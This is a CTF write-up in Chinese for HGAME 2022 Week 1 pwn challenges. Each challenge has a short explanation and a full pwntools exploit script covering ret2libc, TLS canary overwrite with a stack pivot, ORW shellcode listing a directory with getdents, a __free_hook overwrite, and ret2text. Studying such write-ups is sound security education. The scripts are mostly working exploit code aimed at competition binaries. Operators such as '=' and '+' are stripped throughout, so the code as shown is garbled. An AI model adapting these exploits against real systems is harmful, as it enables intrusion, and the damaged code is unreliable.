# PWN-COMPETITION-HGAME2022-Week1

- enter_the_pwn_land
- enter_the_evil_pwn_land
- oldfashion_orw
- ser_per_fa
- test_your_nc
- test_your_gdb

## enter_the_pwn_land
栈溢出。需要注意的是下标 i 的地址比输入 s 的地址更高，s 溢出会覆盖 i，于是需要小心地覆写 i 的值，让循环顺利执行下去；然后就是常规的 ret2libc。
# -*- coding:utf-8 -*-
from pwn import *
context.log_leveldebug
ioprocess(./pwn1)
#ioremote(chuj.top,30722)
elfELF(./pwn1)main_addr0x401260
puts_gotelf.got[puts]
puts_pltelf.plt[puts]
pop_rdi0x401313
ret0x40101a
payloada*44p32(44)b*8p64(pop_rdi)p64(puts_got)p64(puts_plt)p64(main_addr)
io.sendline(payload)
puts_addru64(io.recvuntil(\x7f)[-6:].ljust(8,\x00))
print(puts_addrhex(puts_addr))
libc_baseputs_addr-0x0875a0
systemlibc_base0x055410
binshlibc_base0x1b75aapayloada*44p32(44)b*8p64(pop_rdi)p64(binsh)p64(ret)p64(system)p64(main_addr)
io.sendline(payload)io.interactive()enter_the_evil_pwn_land
栈溢出，开了 canary 保护。不能通过覆盖 canary 低字节为 0x0A 从而 puts 出 canary：test_thread 返回时检测到 canary 不正确，程序就会 crash。test_thread 是新创建的线程，而且栈可溢出的字节数很多，考虑直接覆写 TLS 中的 canary。关键是确定 TLS 中 canary 的偏移，参考《canary 的各种姿势》；通过爆破确定本题 TLS 中 canary 的偏移为 2160。然后是通过栈迁移实现 ret2one_gadget。
# -*- coding:utf-8 -*-
from pwn import *
context.log_leveldebug
ioprocess(./enter_the_evil_pwn_land)
#ioremote(chuj.top,39853)
elfELF(./enter_the_evil_pwn_land)
libcELF(./libc-2.31.so)buf0x404060
offset2160
main_addr0x4011D6
leave_ret0x40125A
puts_gotelf.got[puts]
puts_pltelf.plt[puts]
read_pltelf.plt[read]
pop_rdi0x401363
pop_rsi_r150x401361
ret0x40101a
payloada*48p64(buf)p64(pop_rdi)p64(puts_got)p64(puts_plt)
payloadp64(pop_rdi)p64(0)p64(pop_rsi_r15)p64(buf)p64(0)p64(read_plt)p64(leave_ret)
payloadpayload.ljust(offset,a)
io.sendline(payload)
puts_addru64(io.recvuntil(\x7f)[-6:].ljust(8,\x00))
print(puts_addrhex(puts_addr))
libc_baseputs_addr-libc.sym[puts]
print(libc_basehex(libc_base))pop_rdx_r12_ret libc_base0x11c371
ogglibc_base0xe6c7epayloada*8p64(pop_rdx_r12_ret)p64(0)p64(0)p64(ogg)
io.sendline(payload)io.interactive()oldfashion_orw
-1 绕过 atoi，然后栈溢出泄露 libc 基址。按照题目描述和 hint 知道要读目录，读目录对应的系统调用为 __NR_getdents，系统调用号为 78，参考《getdents - 获得目录项》。遍历目录找文件名前 4 个字符为 flag 的文件，然后 orw 打印 flag。读目录、遍历目录和 orw 没有很合适的 gadgets，故直接写成 shellcode，于是要先 mmap 出一块可执行的内存。exp 如下：
# -*- coding:utf-8 -*-
from pwn import *
from pwnlib.rop import *
from pwnlib.context import *
from pwnlib.fmtstr import *
from pwnlib.util.packing import *
from pwnlib.gdb import *context.log_leveldebug
context.archamd64
context.oslinux#ioprocess(./vuln)
ioremote(chuj.top,43565)
elfELF(./vuln)
libcELF(./libc-2.31.so)#gdb.attach(io,b * 0x4013DB)
#pause()ropROP(elf)
rop.write(1,elf.got[write])
for i in range(0x90//6):rop.read(0,elf.bss(i*6))
rop.migrate(elf.bss())io.sendlineafter(size?\n,-1)
io.sendafter(content?\n,\x00*0x38rop.chain())
io.recvuntil(done!\n)
libc_baseu64(io.recv(6).ljust(8,\x00))-libc.sym[write]
libc.addresslibc_basestring_./\x00
shellcodeasm(mov rsi,0x10000mov rdi,0x600000mov rax,2syscallmov rdx,0xf00mov rsi,0x600100mov rdi,raxmov rax,0x4esyscallmov r8,raxadd r8,0x600100mov r9,0x600100start:mov edx,dword ptr[r90x12]cmp edx,0x67616c66je printxor rcx,rcxmov cx,word ptr[r90x10]add r9,rcxcmp r9,r8jl startjmp endprint:xor rsi,rsimov rdi,r9add rdi,0x12mov rax,2syscallmov rdx,0x100mov rsi,0x600200mov rdi,raxmov rax,0syscallmov rdx,raxmov rsi,0x600200mov rdi,1mov rax,1syscallend:jmp $)rop2ROP(libc)
rop2.mmap(0x600000,0x1000,7,0x21)
rop2.read(0,0x600000,len(shellcode)len(string_))
rop2.call(0x600000len(string_))
io.send(rop2.chain())
sleep(1)
io.send(string_shellcode)#pause()io.interactive()ser_per_fa
程序实现了一个 spfa 算法，题目提示漏洞点不在 spfa 算法内，于是分析其他地方。main 函数中第 33、34 行可以给 v6 输入一个负数实现任意读，泄露程序基址和 libc 基址；add 函数中当写入很多组数据时 num_edge 也会被覆写，覆写 num_edge 为合适的值实现任意写；spfa 函数中第 36 行删除队列会调用 free，于是配合上面的任意写将 free_hook 写成后门函数地址即可 getshell。
# -*- coding:utf-8 -*-
from pwn import *
import hashlib
context.log_leveldebug
ioprocess(./spfa)
#ioremote(chuj.top,49375)
elfELF(./spfa)
libcELF(./libc-2.31.so)def get_pwd(str, num):if(num 1):for x in str:yield xelse:for x in str:for y in get_pwd(str, num-1):yield xystrKey
for i in range(33,127):strKeychr(i)#io.recvuntil(sha256(????) )
#codeio.recvuntil(\n)[:-1]
#for x in get_pwd(strKey,4):
# hhashlib.sha256()
# h.update(x.encode(encodingutf-8))
# h_hexdigesth.hexdigest()
# if h_hexdigestcode:
# io.sendline(x)
# breakio.sendlineafter(datas?\n ,3)#1,泄露程序基址
num1
io.sendlineafter(nodes?\n ,str(num))
io.sendlineafter(edges?\n ,str(num))
for i in range(num):io.sendline(1 2 3)io.sendlineafter(which node?\n ,1)
__frame_dummy_init_array_entry(elf.sym[__frame_dummy_init_array_entry]-elf.sym[dist])//8
io.sendlineafter(to ?\n ,str(__frame_dummy_init_array_entry))
io.recvuntil(shortest path is )
proc_baseint(io.recvuntil(\n)[:-1])-elf.sym[frame_dummy]
print(proc_basehex(proc_base))
backdoorproc_base0x16A5
print(backdoorhex(backdoor))
unk_7068_addrproc_base0x7068
print(unk_7068_addrhex(unk_7068_addr))#2,泄漏libc基址
num1
io.sendlineafter(nodes?\n ,str(num))
io.sendlineafter(edges?\n ,str(num))
for i in range(num):io.sendline(1 2 3)io.sendlineafter(which node?\n ,1)
stdout(elf.bss()-elf.sym[dist])//8
io.sendlineafter(to ?\n ,str(stdout))
io.recvuntil(shortest path is )
_IO_2_1_stdout_int(io.recvuntil(\n)[:-1])
print(_IO_2_1_stdout_hex(_IO_2_1_stdout_))
libc_base_IO_2_1_stdout_-libc.sym[_IO_2_1_stdout_]
print(libc_basehex(libc_base))
free_hook_addrlibc_baselibc.sym[__free_hook]
print(free_hook_addrhex(free_hook_addr))#3,覆写free_hook为后门函数
free_hook_to_unk_7068_offset(free_hook_addr-unk_7068_addr)//24
print(free_hook_to_edge_offsethex(free_hook_to_unk_7068_offset))
num609
io.sendlineafter(nodes?\n ,str(num1))
io.sendlineafter(edges?\n ,str(num1))
send_contentstr(1) str(num1) str(free_hook_to_unk_7068_offset-1)
for i in range(num):io.sendline(send_content)send_contentstr(1) str(backdoor) str(backdoor)
io.sendline(send_content)io.sendlineafter(which node?\n ,2)io.sendline(cat flag)io.interactive()test_your_nc
nc 连上去 cat flag 即可。
test_your_gdb
调试得到 s2 的 16 字节数据；第 23 行的 write 泄露 canary，第 24 行的 gets 造成栈溢出。程序有后门函数，ret2text 即可。
# -*- coding:utf-8 -*-
from pwn import *
context.log_leveldebug
ioprocess(./test_your_gdb)
#ioremote(chuj.top,50610)
elfELF(./test_your_gdb)backdoor0x401256
ans10xb0361e0e8294f147
ans20x8c09e0c34ed8a6a9
io.sendafter(pass word\n,p64(ans1)p64(ans2))io.recv(24)
canaryu64(io.recv(8))
print(canaryhex(canary))payloada*24p64(canary)b*8p64(backdoor)
io.sendline(payload)io.interactive()